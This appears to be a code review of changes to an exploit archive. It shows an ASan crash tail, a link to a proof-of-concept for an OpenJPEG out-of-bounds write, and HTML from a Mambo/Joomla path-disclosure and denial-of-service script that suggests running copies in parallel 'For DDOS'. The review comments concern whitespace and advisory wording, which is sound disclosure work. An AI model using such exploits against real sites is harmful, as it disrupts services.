Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==119535==ABORTING
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip
|
|
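Review bot: TESTED VERSION is master at 805972f (2016/09/12), almost a year before the 2017-09-01 publication date on the files.csv line, and the advisory gives no upstream issue, fix commit or fixed release, so a reader cannot tell whether current OpenJPEG is still affected; add the upstream reference or a sentence on fix status. The DESCRIPTION sentence is also garbled ("can be occurred ... during executing"); "An out-of-bounds write can occur in opj_mqc_byteout (mqc.c) while opj_compress processes a malformed BMP file" says the same thing and matches the ASan frame at mqc.c:221.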
@ -18,7 +18,7 @@ echo'<html>
|
|||
|
||||
<body bgcolor="#FFCCFF">
|
||||
|
||||
<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &
|
||||
<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &
|
||||
(IIS Server-isapi mod) Remote Denial Of Service</font></p>
|
||||
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
|
||||
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
|
||||
|
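Review bot: the removed and added lines ('<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &') are identical as rendered here, so this hunk is presumably a trailing-whitespace or line-ending change rather than a content edit. If so, say "whitespace only" in the commit message; if the intent was to escape the bare "&" as "&amp;", the change did not land.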
@ -37,7 +37,7 @@ Institute</font></p>
|
|||
/mambo/
|
||||
or just / )</span></p>
|
||||
<p><input name="pref" size="20"> <span class="Stile5">prefix (default is
|
||||
"kap")</span></p>
|
||||
"kap")</span></p>
|
||||
<p> useful when you want to Run this script
|
||||
twice or more at the same time against a target For DDOS.</p>
|
||||
<p> to perform it Just rename this file and choose a different
|
||||
|
|
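Review bot: the removed and added lines ('"kap")</span></p>') are identical as rendered, so this hunk, like the first one in this file, reads as a whitespace or line-ending change; the commit message does not mention 1698.php at all, so add a line saying what was changed in it.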